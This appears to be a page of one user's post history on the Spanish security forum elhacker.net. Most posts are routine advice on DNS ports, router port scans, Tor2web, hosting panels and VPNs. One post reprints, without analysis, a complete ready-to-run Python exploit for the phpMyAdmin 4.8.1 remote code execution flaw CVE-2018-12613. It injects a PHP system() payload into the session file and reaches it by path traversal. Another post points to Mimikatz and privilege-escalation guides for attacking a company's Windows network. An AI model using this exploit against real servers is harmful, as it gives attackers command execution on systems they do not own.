elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado:


  Mostrar Mensajes
Páginas: 1 ... 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 [73] 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 ... 630
721  Seguridad Informática / Hacking / Re: Si tuvieras acceso a la red de una empresa que ataques intentarías hacer? en: 27 Diciembre 2021, 22:22 pm
¿Red Windows?

Windows - Mimikatz
https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Windows%20-%20Mimikatz.md

Windows - Privilege Escalation
https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Windows%20-%20Privilege%20Escalation.md
722  Seguridad Informática / Hacking / Re: Curso Completo de Hacking Ético en: 27 Diciembre 2021, 22:20 pm
Citar
Server:         200.25.144.1
Address:        200.25.144.1#53 <------ EL # ??

Es el puerto en este caso.

Normalmente cuando es una dirección web se ponen dos puntos:

http://www.elhacker.net:80
https://www.elhacker.net:443

Pero en servicios tipo DNS se usa la almohadilla #
723  Sistemas Operativos / Mac OS X / Re: Instalar Mac OS Big Sur en virtualbox en: 27 Diciembre 2021, 14:09 pm
Hoy me he animado y funciona correctamente:
724  Comunicaciones / Redes / Re: Aviso sobre servicios de red abiertos en: 26 Diciembre 2021, 21:31 pm
Citar
- He formateado el ordenador por si era un tema de virus.

Si tuvieras un virus (malware, RAT), no abriría ningún puerto y menos el 23.

Citar
En el router (ZTE F6640) no supe como mirar los puertos abiertos.

Busca por NAT o PortForwarding.





Citar
- Descargue una app llamada Fing donde me aparecen abiertos los puertos: 23, 53, 80 y 443

La app fing no debería encontrar ningún puerto abierto en tu ip pública. ALgo falla aquí. Seguro que el router no deja expuestos esos puertos en la WAN (internet)

Citar
- He pasado el “Inspector de Red” una opción del ESET Internet Security por dos ordenadores distintos y me da el mismo error (Me llama la atencion que cuando realizo ese escaneo el antivirus llama a mi red E402_2 en lugar de E402)

¿estás usando Windows 10? Trae un firewall por defecto activo y ninguno de los puertos (servicios) que comentas abiertos.

¿Te refieres red Wifi E402_2?

Citar
- He mirado también en otros foros para ver alternativas, otras soluciones...

Bien hecho jejeje, es lo mejor que puedes hacer. Simplemente que lo busqué en google y al ver la misma pregunta pues me hizo gracia  :P
725  Comunicaciones / Redes / Re: tor2web, que es y como funciona? en: 26 Diciembre 2021, 21:23 pm
Por visitar un enlace en principio no pasa nada. Máximo robar las cookies de un sitio mal configurado y no es nada habitual.

Recuerda que si navegas por Tor o no, hacerlo siempre vía https. Ya han habido muchos casos de robos de billeteras de criptomonedas por usar http en vez de https, aunque sea vía Tor.

Lo más fácil es bajar el navegador web Tor y navegar por la deep web sin problemas, no usar servicios de terceros como Tor2Web, sólo debe ser usado como una alternativa bajo x circunstancias (por ejemplo, que no puedas instalar navegador)
726  Programación / Desarrollo Web / Re: plesk es un cms? en: 26 Diciembre 2021, 21:18 pm
Plesk es un panel de control para administrar un hosting contratado, igual que Cpanel de pago.

Webmin (VirtualMin), ISPConfig, VestaCP son gratuitos
727  Comunicaciones / Redes / Re: tor2web, que es y como funciona? en: 26 Diciembre 2021, 10:24 am
Citar
colocara un link en el navegador y que aceptara las condiciones,

¿Y qué link era? ¿Y qué condiciones eran? ¿Avisos del navegador o instalar alguna extensión o complemento del navegador?

No sé porque alguien usa Tor2web, pudiendo bajar el navegador TOR normal.
728  Seguridad Informática / Bugs y Exploits / phpMyAdmin 4.8.1 - Remote Code Execution (RCE) CVE 2018-12613 en: 26 Diciembre 2021, 10:19 am
Código
  1. # Exploit Title: phpMyAdmin 4.8.1 - Remote Code Execution (RCE)
  2. # Date: 17/08/2021
  3. # Exploit Author: samguy
  4. # Vulnerability Discovery By: ChaMd5 & Henry Huang
  5. # Vendor Homepage: http://www.phpmyadmin.net
  6. # Software Link: https://github.com/phpmyadmin/phpmyadmin/archive/RELEASE_4_8_1.tar.gz
  7. # Version: 4.8.1
  8. # Tested on: Linux - Debian Buster (PHP 7.3)
  9. # CVE : CVE-2018-12613
  10.  
  11. #!/usr/bin/env python
  12.  
  13. import re, requests, sys
  14.  
  15. # check python major version
  16. if sys.version_info.major == 3:
  17.   import html
  18. else:
  19.   from six.moves.html_parser import HTMLParser
  20.   html = HTMLParser()
  21.  
  22. if len(sys.argv) < 7:
  23.   usage = """Usage: {} [ipaddr] [port] [path] [username] [password] [command]
  24. Example: {} 192.168.56.65 8080 /phpmyadmin username password whoami"""
  25.   print(usage.format(sys.argv[0],sys.argv[0]))
  26.   exit()
  27.  
  28. def get_token(content):
  29.   s = re.search('token"\s*value="(.*?)"', content)
  30.   token = html.unescape(s.group(1))
  31.   return token
  32.  
  33. ipaddr = sys.argv[1]
  34. port = sys.argv[2]
  35. path = sys.argv[3]
  36. username = sys.argv[4]
  37. password = sys.argv[5]
  38. command = sys.argv[6]
  39.  
  40. url = "http://{}:{}{}".format(ipaddr,port,path)
  41.  
  42. # 1st req: check login page and version
  43. url1 = url + "/index.php"
  44. r = requests.get(url1)
  45. content = r.content.decode('utf-8')
  46. if r.status_code != 200:
  47.   print("Unable to find the version")
  48.   exit()
  49.  
  50. s = re.search('PMA_VERSION:"(\d+\.\d+\.\d+)"', content)
  51. version = s.group(1)
  52. if version != "4.8.0" and version != "4.8.1":
  53.   print("The target is not exploitable".format(version))
  54.   exit()
  55.  
  56. # get 1st token and cookie
  57. cookies = r.cookies
  58. token = get_token(content)
  59.  
  60. # 2nd req: login
  61. p = {'token': token, 'pma_username': username, 'pma_password': password}
  62. r = requests.post(url1, cookies = cookies, data = p)
  63. content = r.content.decode('utf-8')
  64. s = re.search('logged_in:(\w+),', content)
  65. logged_in = s.group(1)
  66. if logged_in == "false":
  67.   print("Authentication failed")
  68.   exit()
  69.  
  70. # get 2nd token and cookie
  71. cookies = r.cookies
  72. token = get_token(content)
  73.  
  74. # 3rd req: execute query
  75. url2 = url + "/import.php"
  76. # payload
  77. payload = '''select '<?php system("{}") ?>';'''.format(command)
  78. p = {'table':'', 'token': token, 'sql_query': payload }
  79. r = requests.post(url2, cookies = cookies, data = p)
  80. if r.status_code != 200:
  81.   print("Query failed")
  82.   exit()
  83.  
  84. # 4th req: execute payload
  85. session_id = cookies.get_dict()['phpMyAdmin']
  86. url3 = url + "/index.php?target=db_sql.php%253f/../../../../../../../../var/lib/php/sessions/sess_{}".format(session_id)
  87. r = requests.get(url3, cookies = cookies)
  88. if r.status_code != 200:
  89.   print("Exploit failed")
  90.   exit()
  91.  
  92. # get result
  93. content = r.content.decode('utf-8', errors="replace")
  94. s = re.search("select '(.*?)\n'", content, re.DOTALL)
  95. if s != None:
  96.   print(s.group(1))
  97.  
729  Sistemas Operativos / Windows / Re: cambiar sistema operativo linux mint a windows 7 en: 25 Diciembre 2021, 21:57 pm
Citar
Me gustaría cambiar de linux mint a windows 7 y no me deja.

¿Cambiar te refieres a instalar Windows 7 y usar sólo Windows? ¿O poder usar los dos sistemas operativos con un gestor de arranque?
730  Sistemas Operativos / Windows / Re: nordvpn chrome en: 25 Diciembre 2021, 21:55 pm
¿es NordVPN una VPN de pago? Creo que si, te pide un usuario y contraseña

Puedes guardar los datos en el gestor de contraseñas del navegador, por ejemplo.

NordVPN tiene muy buena documentación, seguro que está bien explicado.
Páginas: 1 ... 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 [73] 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 ... 630
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines